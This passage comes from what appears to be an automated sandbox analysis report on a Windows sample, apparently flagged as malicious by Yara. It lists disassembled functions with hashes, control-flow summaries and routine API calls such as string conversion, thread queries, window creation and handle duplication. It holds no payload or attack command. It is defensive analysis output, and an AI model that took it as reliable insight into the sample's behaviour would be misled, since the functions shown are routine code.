                                                                                                                  • Opcode ID: 9b2baa925ac2705a77502838524540c5ce195933e3b2ffcaa98abbbe7c838887
                                                                                                                  • Instruction ID: e4313f69cbce103fec8176aee4eaa7a48783e8892b9cbd744338e6c7537d6fc5
                                                                                                                  • Opcode Fuzzy Hash: 9b2baa925ac2705a77502838524540c5ce195933e3b2ffcaa98abbbe7c838887
                                                                                                                  • Instruction Fuzzy Hash: 2BB1B475E01218CFEB64CF6AC944B9EBBF2AF89310F10C0EAD549A7254DB345A85CF51
                                                                                                                  Function 2995D970 Relevance: .2, Instructions: 228COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 652f75dce9964bbb59127590b59c2af68c092d77fd250d57e1afd39f2a2c59f9
                                                                                                                  • Instruction ID: a641142a806972910cf69c4d239cfd58b82ebf8c6d51d46b60bee6a032478c3b
                                                                                                                  • Opcode Fuzzy Hash: 652f75dce9964bbb59127590b59c2af68c092d77fd250d57e1afd39f2a2c59f9
                                                                                                                  • Instruction Fuzzy Hash: F5B1B474E012288FEB64CF6AC944B9EBBF2BF89300F14C0EAD449A7254DB745A85CF51
                                                                                                                  Function 2995D280 Relevance: .2, Instructions: 228COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cd66bcfba50e0ccba7604ab2c696759780326fd43922c22d9b90a042468e56c8
                                                                                                                  • Instruction ID: 9d8965396cf653178fa54be4a3bcbb9386deb04cc6d2c7896364ff6c7acf7f8a
                                                                                                                  • Opcode Fuzzy Hash: cd66bcfba50e0ccba7604ab2c696759780326fd43922c22d9b90a042468e56c8
                                                                                                                  • Instruction Fuzzy Hash: D4B1B474E01228CFEB64CF6AC944B9EBBF2AF89310F14C1EAD449A7254D7345A85CF51
                                                                                                                  Function 2995EE28 Relevance: .2, Instructions: 228COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 15f5ceddb717eea4544d51a1fd4672807a3c72579072218be7ec37d4ade4f684
                                                                                                                  • Instruction ID: 32e7baa55eaaafc62adba0fa501e19c7b410f4b29a18164f46f7523f1fcf8d76
                                                                                                                  • Opcode Fuzzy Hash: 15f5ceddb717eea4544d51a1fd4672807a3c72579072218be7ec37d4ade4f684
                                                                                                                  • Instruction Fuzzy Hash: 4AB1C475E01228CFEB64CF6AC944B9EBBF2AF89310F14C0EAD449A7254DB345A85CF51
                                                                                                                  Function 2995E740 Relevance: .2, Instructions: 227COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e022389571bf2f99f79f37a330d797a65a5cfc899d47c57692e110f1da929715
                                                                                                                  • Instruction ID: aca2e61af8577a32c0dc88211a26f74f9c3cf067a158c33054e82c5caae1c0c1
                                                                                                                  • Opcode Fuzzy Hash: e022389571bf2f99f79f37a330d797a65a5cfc899d47c57692e110f1da929715
                                                                                                                  • Instruction Fuzzy Hash: 81A1B574E012288FEB64CF6AC984B9EBBF6BF89300F10C0E9D549A7254D7355A85CF51
                                                                                                                  Function 2995E058 Relevance: .2, Instructions: 227COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5c0d9b20996728e862805e92956fad211e16e322a70e5d62a3b583714175c869
                                                                                                                  • Instruction ID: 78c9de18463c99610b14be50fef49a57797401ae5c87d1680814047bde7cf77b
                                                                                                                  • Opcode Fuzzy Hash: 5c0d9b20996728e862805e92956fad211e16e322a70e5d62a3b583714175c869
                                                                                                                  • Instruction Fuzzy Hash: 97A1B574E01228DFEB64CF6AC984B9EBBF6AF89300F10C1E9D449A7254D7345A85CF51
                                                                                                                  Function 28DFE1C8 Relevance: .2, Instructions: 223COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2543136434.0000000028DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28DF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_28df0000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a2e0816a7377767a609a5752fbd13f73d5bb01dbfd84ec1bff8d2f8ab07868f9
                                                                                                                  • Instruction ID: 7585a015f615585395176fccabe371b7ac329f3f6cea4220528062b94de1e611
                                                                                                                  • Opcode Fuzzy Hash: a2e0816a7377767a609a5752fbd13f73d5bb01dbfd84ec1bff8d2f8ab07868f9
                                                                                                                  • Instruction Fuzzy Hash: 62A11574D00218CFEB14DFA9C884B9DBBB1FF89304F208269E409AB391DB749989CF55
                                                                                                                  Function 2995E730 Relevance: .2, Instructions: 164COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: de1151a22ce8a471a827d18292b12e457462734dfdfdbe5334cb567f20e9a718
                                                                                                                  • Instruction ID: 06e4c504094a1edd859a78e92dc0eb439bd0d1bb9724fd02ed9c270a2c19ff57
                                                                                                                  • Opcode Fuzzy Hash: de1151a22ce8a471a827d18292b12e457462734dfdfdbe5334cb567f20e9a718
                                                                                                                  • Instruction Fuzzy Hash: E971A674E012288FEB58CF6AC98479EBBF2AF89300F14C0EAD44DA7254DB744A85CF51
                                                                                                                  Function 2995E048 Relevance: .2, Instructions: 164COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fd89f5705b2ec82cc4e20c867e0547c3611b6375211fd148c2fe78a881742a65
                                                                                                                  • Instruction ID: a1fa8863e6e3136435efca8fe884d28d689afc86736ee04e431c0de4957e310a
                                                                                                                  • Opcode Fuzzy Hash: fd89f5705b2ec82cc4e20c867e0547c3611b6375211fd148c2fe78a881742a65
                                                                                                                  • Instruction Fuzzy Hash: B171B774E012288FEB58CF66C98479EBBF2AF89300F04C1EAD40DA7254DB744A85CF11
                                                                                                                  Function 2995D272 Relevance: .1, Instructions: 110COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a4024baac345920ff952458809c307667a83fde6d16f769dd3e96d2e2574f250
                                                                                                                  • Instruction ID: 14710c58ce74f4c05961c4c903ed9e69d0fc11ba0a759c7a1f70527daa49f7e6
                                                                                                                  • Opcode Fuzzy Hash: a4024baac345920ff952458809c307667a83fde6d16f769dd3e96d2e2574f250
                                                                                                                  • Instruction Fuzzy Hash: 8B4166B5E016188BEB58CF6BC95479AFAF3AFC9300F04C1BAC50DA6254DB744A858F51
                                                                                                                  Function 2995EE19 Relevance: .1, Instructions: 108COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d44e82a9e1d01b363392ac265d6ca26566af31343c3d490772c703942697e5ad
                                                                                                                  • Instruction ID: c019affddbe7a53b46424a23cd7ee62ea72f3a06afba7ec0f86c847ad2a94d39
                                                                                                                  • Opcode Fuzzy Hash: d44e82a9e1d01b363392ac265d6ca26566af31343c3d490772c703942697e5ad
                                                                                                                  • Instruction Fuzzy Hash: C6417971E016188BEB58CF6BC94479EFAF7AFC9310F14C1BAC50DAA254DB740A868F51
                                                                                                                  Function 2995F501 Relevance: .1, Instructions: 107COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e557fae4bd9e6aa857fbc2caa4709dda16bb6e3d73ac1fffaa57fe0aa71772b7
                                                                                                                  • Instruction ID: c3b0b16718a685bf3d8b2279d324b5998bb6765a01a3ce865d7d96b95a1ab0dc
                                                                                                                  • Opcode Fuzzy Hash: e557fae4bd9e6aa857fbc2caa4709dda16bb6e3d73ac1fffaa57fe0aa71772b7
                                                                                                                  • Instruction Fuzzy Hash: 60416AB1E016188BEB58CF6BC95479EFAF3AFC9310F04C1BAC54DA6254DB740A868F51
                                                                                                                  Function 2995D96C Relevance: .1, Instructions: 106COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d3c8e040d3bedcaac7670c58bf9fc855eaa2e615eccf7217242eedbac4d19fc3
                                                                                                                  • Instruction ID: df1d67454639543c28fc096b73708fe22a5eac84f13dee615957082d3b596789
                                                                                                                  • Opcode Fuzzy Hash: d3c8e040d3bedcaac7670c58bf9fc855eaa2e615eccf7217242eedbac4d19fc3
                                                                                                                  • Instruction Fuzzy Hash: B34179B1E016188BEB58CF6BC94479EFAF3AFC9300F04C0BAC50DA6254EB740A858F51
                                                                                                                  Function 2995AB39 Relevance: .1, Instructions: 104COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fdb28947ad2ed0ea5ba14aa0ea7b45022abcaeb2918116e2cf736a10b4eddc9a
                                                                                                                  • Instruction ID: 7626822c2dcb233174e993baf2d8b74d4d17cd9e5bf9669e8d47e681cee7efcb
                                                                                                                  • Opcode Fuzzy Hash: fdb28947ad2ed0ea5ba14aa0ea7b45022abcaeb2918116e2cf736a10b4eddc9a
                                                                                                                  • Instruction Fuzzy Hash: 9A41D574E012188FEB68CFBAC85079EBBF2AF89300F50C0A9C419A7255DB355A86CF55
                                                                                                                  Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 156 4018f0-4018fa 157 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 156->157 158 4018fc-401900 156->158 161 401940-401949 GetLastError 157->161 162 401996-40199a 157->162 163 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 161->163 164 40198d-40198f 161->164 163->164 164->162 166 401991 call 401030 164->166 166->162
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                  • GetLastError.KERNEL32 ref: 00401940
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3322701435-0
                                                                                                                  • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                  • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                  • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                  • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                  Function 29B5C877 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 169 29b5c877-29b5c917 GetCurrentProcess 173 29b5c920-29b5c954 GetCurrentThread 169->173 174 29b5c919-29b5c91f 169->174 175 29b5c956-29b5c95c 173->175 176 29b5c95d-29b5c991 GetCurrentProcess 173->176 174->173 175->176 177 29b5c993-29b5c999 176->177 178 29b5c99a-29b5c9b2 176->178 177->178 190 29b5c9b5 call 29b5ca57 178->190 191 29b5c9b5 call 29b5cea8 178->191 182 29b5c9bb-29b5c9ea GetCurrentThreadId 183 29b5c9f3-29b5ca55 182->183 184 29b5c9ec-29b5c9f2 182->184 184->183 190->182 191->182
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 29B5C906
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 29B5C943
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 29B5C980
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 29B5C9D9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2063062207-0
                                                                                                                  • Opcode ID: 35d728b5a58411a40f0144d9d4eced6a4ec887f89482b61067abb3e1d5c4484f
                                                                                                                  • Instruction ID: bf692d5e9cf6f992432f791cf8daee5f84b9abde3f5d1d7f8e53fd04a65af921
                                                                                                                  • Opcode Fuzzy Hash: 35d728b5a58411a40f0144d9d4eced6a4ec887f89482b61067abb3e1d5c4484f
                                                                                                                  • Instruction Fuzzy Hash: F95196B49013498FEB19DFAAC988B9EBBF1EF89310F20805DE009A73A0D7345945CF65
                                                                                                                  Function 29B5C888 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 192 29b5c888-29b5c917 GetCurrentProcess 196 29b5c920-29b5c954 GetCurrentThread 192->196 197 29b5c919-29b5c91f 192->197 198 29b5c956-29b5c95c 196->198 199 29b5c95d-29b5c991 GetCurrentProcess 196->199 197->196 198->199 200 29b5c993-29b5c999 199->200 201 29b5c99a-29b5c9b2 199->201 200->201 213 29b5c9b5 call 29b5ca57 201->213 214 29b5c9b5 call 29b5cea8 201->214 205 29b5c9bb-29b5c9ea GetCurrentThreadId 206 29b5c9f3-29b5ca55 205->206 207 29b5c9ec-29b5c9f2 205->207 207->206 213->205 214->205
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 29B5C906
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 29B5C943
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 29B5C980
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 29B5C9D9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2063062207-0
                                                                                                                  • Opcode ID: 986e18229a4f1030d39827bbaa3adca7a01321ae573e9c2e8c445b93d831e01e
                                                                                                                  • Instruction ID: 18f6ee40962720416f2cb29be7647023332966f6877cee8d77c2d5ac8529a258
                                                                                                                  • Opcode Fuzzy Hash: 986e18229a4f1030d39827bbaa3adca7a01321ae573e9c2e8c445b93d831e01e
                                                                                                                  • Instruction Fuzzy Hash: FC5176B49013498FEB14DFAAC588B9EBBF1EF88311F20805DE419A73A0DB346945CF65
                                                                                                                  Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 215 40af66-40af6e 216 40af7d-40af88 call 40b84d 215->216 219 40af70-40af7b call 40d2e3 216->219 220 40af8a-40af8b 216->220 219->216 223 40af8c-40af98 219->223 224 40afb3-40afca call 40af49 call 40cd39 223->224 225 40af9a-40afb2 call 40aefc call 40d2bd 223->225 225->224
                                                                                                                  APIs
                                                                                                                  • _malloc.LIBCMT ref: 0040AF80
                                                                                                                    • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                    • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                    • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                    • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1411284514-0
                                                                                                                  • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                  • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                  • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                  • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                  Function 29B59D24 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1823 29b59d24-29b59dc6 1824 29b59ddd-29b59de8 1823->1824 1825 29b59dc8-29b59dda 1823->1825 1826 29b59dfc-29b59e5c 1824->1826 1827 29b59dea-29b59df9 1824->1827 1825->1824 1829 29b59e64-29b59f04 CreateWindowExW 1826->1829 1827->1826 1830 29b59f06-29b59f0c 1829->1830 1831 29b59f0d-29b59f78 1829->1831 1830->1831 1835 29b59f85 1831->1835 1836 29b59f7a-29b59f7d 1831->1836 1837 29b59f86 1835->1837 1836->1835 1837->1837
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 29B59EF1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 716092398-0
                                                                                                                  • Opcode ID: fc5eee8c732c0b17e9585bfcf97206fcdfcd7b7ffc9ae5619e6b79399ddb3042
                                                                                                                  • Instruction ID: 2991eeb6b510a50ea9a315c21c899b3bcb56519a9a65e2f8d3b517d3e6d88f03
                                                                                                                  • Opcode Fuzzy Hash: fc5eee8c732c0b17e9585bfcf97206fcdfcd7b7ffc9ae5619e6b79399ddb3042
                                                                                                                  • Instruction Fuzzy Hash: EF7179B4D00218DFDF20CFA9D984ADDBBF1BF49304F5091AAE818A7221D730AA85CF45
                                                                                                                  Function 29B59D30 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1838 29b59d30-29b59dc6 1839 29b59ddd-29b59de8 1838->1839 1840 29b59dc8-29b59dda 1838->1840 1841 29b59dfc-29b59f04 CreateWindowExW 1839->1841 1842 29b59dea-29b59df9 1839->1842 1840->1839 1845 29b59f06-29b59f0c 1841->1845 1846 29b59f0d-29b59f78 1841->1846 1842->1841 1845->1846 1850 29b59f85 1846->1850 1851 29b59f7a-29b59f7d 1846->1851 1852 29b59f86 1850->1852 1851->1850 1852->1852
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 29B59EF1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 716092398-0
                                                                                                                  • Opcode ID: a270c8941e8230f78b2eaad9b44acad6a7020fbffab02e10051078a3981420dd
                                                                                                                  • Instruction ID: 43aa7598542b1ffdef491f0d69da2a423fe77606cd9689961f3aadccdea53434
                                                                                                                  • Opcode Fuzzy Hash: a270c8941e8230f78b2eaad9b44acad6a7020fbffab02e10051078a3981420dd
                                                                                                                  • Instruction Fuzzy Hash: 7E7159B4D002589FDF20CFA9D980B9DBBB1BF09300F5091AAE918A7261D770AA85CF55
                                                                                                                  Function 28DFAA30 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • KiUserExceptionDispatcher.NTDLL ref: 28DFAAC6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2543136434.0000000028DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28DF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_28df0000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DispatcherExceptionUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 6842923-0
                                                                                                                  • Opcode ID: bcbb59de5aaf103310e1e25c5f942af1fa050282568af233d7a072ae46e8bc69
                                                                                                                  • Instruction ID: 226de51e3e1061781e618d56210d81f805702b7921c01da0704cff283cf3b4da
                                                                                                                  • Opcode Fuzzy Hash: bcbb59de5aaf103310e1e25c5f942af1fa050282568af233d7a072ae46e8bc69
                                                                                                                  • Instruction Fuzzy Hash: 2851AA7A4392069FE7516FB4C1AC96ABE76FB4F363700AD10A14AC3011BF3808498AE4
                                                                                                                  Function 29B5CA57 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2048 29b5ca57-29b5ca60 2049 29b5ca62-29b5ca91 call 29b5c6cc 2048->2049 2050 29b5cabf-29b5cbab DuplicateHandle 2048->2050 2054 29b5ca96-29b5cabc 2049->2054 2052 29b5cbb4-29b5cbf4 2050->2052 2053 29b5cbad-29b5cbb3 2050->2053 2053->2052
                                                                                                                  APIs
                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 29B5CB9B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DuplicateHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3793708945-0
                                                                                                                  • Opcode ID: f234aac5266fb686fe54ebe5b4533769f275c665ea39558aa4845f06a5f6c52f
                                                                                                                  • Instruction ID: ba2adf51875a3638410797bdbd7b941395807971275628af111ebbcccf30eebd
                                                                                                                  • Opcode Fuzzy Hash: f234aac5266fb686fe54ebe5b4533769f275c665ea39558aa4845f06a5f6c52f
                                                                                                                  • Instruction Fuzzy Hash: 1951DD79D042889FCB01CFA9D880ADEBFB5FF4A310F14806AE918AB361D335A955CF50
                                                                                                                  Function 29B5CAD0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
